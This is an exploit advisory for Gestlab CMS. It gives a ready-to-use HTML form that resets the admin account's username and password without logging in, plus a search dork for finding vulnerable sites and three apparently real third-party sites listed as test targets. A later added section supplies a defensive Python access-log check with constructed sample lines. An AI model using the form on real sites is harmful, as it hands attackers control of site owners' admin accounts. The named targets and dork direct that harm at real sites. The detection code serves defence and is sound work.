
Gestlab CMS Script Admin User Password Changer Vulnerability




Exploit Detail :

# Exploit Title: Gestlab CMS Script Admin User Password Changer
# Date: 2016-09-13
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.clicom.it/
# Version:      All Versions
# Dork : "Website by Clicom" or "Questo sito utilizza i cookie."

Exploit :
Admin Panel : http://site/gestlab/
<form method="post" action="http://site/gestlab/gestione.php" enctype="multipart/form-data">
        iduser : <input type="text" name="iduser" value="1"><br> <!-- user id   -->
        user : <input type="text" name="user" value="new username"><br> <!-- new username -->
        pass : <input type="text" name="pass" value="new password"><br> <!-- new password -->
        <input type="submit" name="submit" value="moduser">
</form>

After the page loads or an alert is shown, go to http://site/gestlab/
Now you can log in with the new username and password :)
Example :

<form method="post" action="http://site/gestlab/gestione.php" enctype="multipart/form-data">
        iduser : <input type="text" name="iduser" value="1"><br> <!-- user id   -->
        user : <input type="text" name="user" value="meisam"><br> <!-- new username -->
        pass : <input type="text" name="pass" value="meisam"><br> <!-- new password -->
        <input type="submit" name="submit" value="moduser">
</form>
After running this exploit, the username and password are both: meisam
Test :
<form method="post" action="http://eletras.it/gestlab/gestione.php" enctype="multipart/form-data">
        iduser : <input type="text" name="iduser" value="1"><br>
        user : <input type="text" name="user" value="meisam"><br>
        pass : <input type="text" name="pass" value="meisam"><br>
        <input type="submit" name="submit" value="moduser">
</form>
<form method="post" action="http://www.ristoservicesrl.com/gestlab/gestione.php" enctype="multipart/form-data">
        iduser : <input type="text" name="iduser" value="1"><br>
        user : <input type="text" name="user" value="meisam"><br>
        pass : <input type="text" name="pass" value="meisam"><br>
        <input type="submit" name="submit" value="moduser">
</form>
<form method="post" action="http://www.mcm-america.com/gestlab/gestione.php" enctype="multipart/form-data">
        iduser : <input type="text" name="iduser" value="1"><br>
        user : <input type="text" name="user" value="meisam"><br>
        pass : <input type="text" name="pass" value="meisam"><br>
        <input type="submit" name="submit" value="moduser">
</form>
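
Detection (added example, not part of the original advisory): a log check a site operator could run to find POST requests to gestione.php that came from a form hosted somewhere other than the site itself, as the forms above are. It assumes the Apache/nginx "combined" access-log format; the hostnames, IPs, the utenti.php path and the log lines are constructed, and the Referer test is only a triage signal because a client can set that header freely.

```python
import re
from urllib.parse import urlparse

# Assumption: "combined" log format; the vhost is not logged, so the
# site's own hostnames are supplied by the caller.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TARGET = "/gestlab/gestione.php"  # endpoint named in the advisory


def suspicious_posts(lines, own_hosts):
    """Return entries for POSTs to gestione.php whose Referer is missing
    or names another origin (the form was not served by this site)."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Drop the query string; compare case-insensitively.
        path = m["path"].split("?", 1)[0].lower()
        if path != TARGET:
            continue
        # "-" or an empty Referer parses to no hostname at all.
        ref_host = (urlparse(m["referer"]).hostname or "").lower()
        if ref_host not in own:
            hits.append({"ip": m["ip"], "time": m["ts"],
                         "status": int(m["status"]),
                         "referer": m["referer"]})
    return hits


# Constructed sample log lines (documentation IP ranges, example.com host).
SAMPLE = [
    '198.51.100.7 - - [13/Sep/2016:10:01:02 +0000] "POST /gestlab/gestione.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Sep/2016:10:05:40 +0000] "POST /gestlab/gestione.php HTTP/1.1" 200 498 "http://www.example.com/gestlab/utenti.php" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Sep/2016:10:06:11 +0000] "GET /gestlab/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [13/Sep/2016:11:30:00 +0000] "POST /gestlab/gestione.php HTTP/1.1" 200 512 "http://attacker.invalid/form.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_posts(SAMPLE, {"www.example.com", "example.com"}):
        print(hit)
```

The request body is not written to the access log, so a hit does not show which `iduser` was changed or what values were submitted.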
